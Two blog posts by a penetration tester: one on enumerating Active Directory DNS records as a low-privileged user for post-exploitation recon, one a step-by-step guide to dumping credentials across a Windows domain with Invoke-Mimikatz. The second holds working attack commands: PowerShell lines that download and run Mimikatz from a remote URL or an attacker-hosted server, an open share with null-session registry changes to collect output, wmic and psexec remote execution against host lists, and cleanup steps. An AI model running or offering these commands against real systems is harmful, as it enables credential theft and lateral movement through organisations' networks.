Friday, October 4, 2013

AD Zone Transfers as a user

The tired and true method for Zone Transfers are using either nslookup:
nslookup
ls -d domain.com.local
Or dig:
dig -t AXFR domain.com.local @ns1.domain.com.local
In the Windows Enterprise world there are a few more options. If you are a DNS Admin you can use the 'dnscmd' command like so:
dnscmd /EnumZones
dnscmd /ZonePrint domain.com.local
Which is handy if you can pop the DNS server (usually the Domain Controller so you usually have better things to do at that point).

You can also use PowerShell:

PS C:\Users\jdoe> get-wmiobject -ComputerName dc1 -Namespace root\microsoftDNS -Class MicrosoftDNS_ResourceRecord -Filter "domainname='projectmentor.net'" | select textrepresentation
Again, this requires you to be a very high privileged account, which is no fun. I need these computer lists as part of my internal / post-exploitation recon, not an end step.

For the longest time I relied on a very awesome tool called "Adfind":
adfind -sc computers_active -csv -nodn -nocsvq -nocsvheader
This command will output a list of computer accounts that have been active in the last 90 days in a straight line by line format (hence all of the no "this"and no "that" flags)

But that wasn't good enough, this image kept haunting me:


It's Active Directory Explorer by SysInternals. It shows the complete list of DNS records, stored as objects in Active Directory that I was able to get to as a basic domain user. This means all of the static DNS records for the unix systems and mainframes and other systems outside of the purely Windows world are there as well.

I spent 4 days attempting to write my own script, ldap query, prayer to  get all of the data out but was unsuccessful. On the 5th day I happened upon a very short post saying "I did it", as I probably would have written the same. It comes in the form of a PowerShell script that you can find here:

Code: https://github.com/mmessano/PowerShell/blob/master/dns-dump.ps1

And is very easy to run:
PS C:\Users\jdoe> dns-dump.ps1 -zone projectmentor.net -dc dc1

or
C:\> powershell -ep bypass -f dnsdump.ps1 -zone projectmentor.net -dc dc1
If you put a -csv on the end of those the author has even given you the CSV format which makes the output extremely easy to parse. Now you can throw your list into your tool of choice instead of scanning random IP ranges on the targets network for important stuff you can scan directly against known good hosts.

-- mubix

P.S. Yes I realize this isn't actually "Zone Transfer"s but its close enough 

Dumping a domain's worth of passwords with mimikatz


clymb3r recently posted a script called "Invoke-Mimikatz.ps1" basically what this does is reflectively injects mimikatz into memory, calls for all the logonPasswords and exits. It even checks the targets architecture (x86/x64) first and injects the correct DLL.

You can very easily use this script directly from an admin command prompt as so:

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"
(This works REALLY well for Citrix and Kiosk scenarios and it's too hard to type/remember)
This runs the powershell script by directly pulling it from Github and executing it "in memory" on your system. 

One of the awesome added capabilities for this script is to run on a list of hosts. as so:
powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds -ComputerName @('computer1', 'computer2')"
This works great as all the output is directly on your system and all executed through Powershell Remoting. Powershell Remoting is pretty much the same as WinRM. This service however is not enabled by default and can be pretty hit or miss on how much any given enterprise uses WinRM. However, it is usually the servers and more important systems that have it enabled more often than not.

You can find WinRM / PowerShell Remoting by scanning for the service port 47001 as well as the default comm ports for WinRM 5985 (HTTP) and 5986 (HTTPS).

If you find that your target isn't a WinRM rich environment or you just want more passwords you can take a slightly more painful route, I call it "Mass Mimikatz"

Step 1. Make a share, we are doing this so we can not only collect the output of all our computers passwords, but to host the CMD batch file that will run the powershell script:
cd\
mkdir open
net share open=C:\open /grant:everyone,full
icacls C:\open\ /grant Everyone:(OI)(CI)F /t
We are setting "Everyone" permissions on a Share (net share) and NTFS (icacls) level for this to work properly.

Step 2. Set registry keys. There are two registry keys that we need to set. The first allows Null Sessions to our new share and the second allows null users to have the "Everyone" token so that we don't have to get crazy with our permissions. I have create a meterpreter script that has a bunch of error checking here: massmimi_reg.rb
or you can just make the following changes"
HKLM\System\CurrentControlSet\services\LanmanServer\Parameters NullSessionShares REG_MULTI_SZ  = open
HKLM\System\CurrentControlSet\Contol\Lsa "EveryoneIncludesAnonymous" = 1
Step 3. Change directory into new "open" directory. This is so our uploads and in particular our web server will be hosted out of the correct directory.

Step 4. Upload powershell script powermeup.cmd - this script will run our hosted Invoke-Mimikatz script on each host:
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.127:8080/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds > \\192.168.1.127\open\%COMPUTERNAME%.txt 2>&1
Step 5. Upload clymb3r's Invoke-Mimikatz ps1 - Download from PowerSploit repo: source on github

Step 6. Upload mongoose: Downloads Page - Both regular and tiny versions work. This is an awesome, single executable webserver that supports LUA, Sqlite, and WebDAV out of the box. Tiny version is under 100k.

Step 7. Upload serverlist.txt - This is a line by line list of computer names to use mimikatz on. You'll have to gather this one way or another.

Step 8. Execute mongoose (from directory with mimikatz.ps1) - This will start a listener with directory listings enabled on port 8080 by default

Step 9a. Execute wmic:
wmic /node:@serverlist.txt process call create "\\192.168.92.127\open\powershellme.cmd"
Step 9b. Execute wmic with creds:
wmic /node:@serverlist.txt /user:PROJECTMENTOR\jdoe /password:ASDqwe123 process call create "\\192.168.92.127\open\powershellme.cmd"
Step 10. Watch as text files full of wonder and joy fill your share.
Don't forget to clean up::

Step 1. kill mongoose process
Step 2. net share open /delete
Step 3. kill/reset registry values
Step 4. delete "open" directory

Got a better way of getting this done? Please leave a comment.

P.S. You could just enable Powershell Remoting for them ;)
psexec @serverlist.txt -u [admin account name] -p [admin account password] -h -d powershell.exe "enable-psremoting -force"
--mubix

I got passwords from here,here,here,here, EVERYWHERE!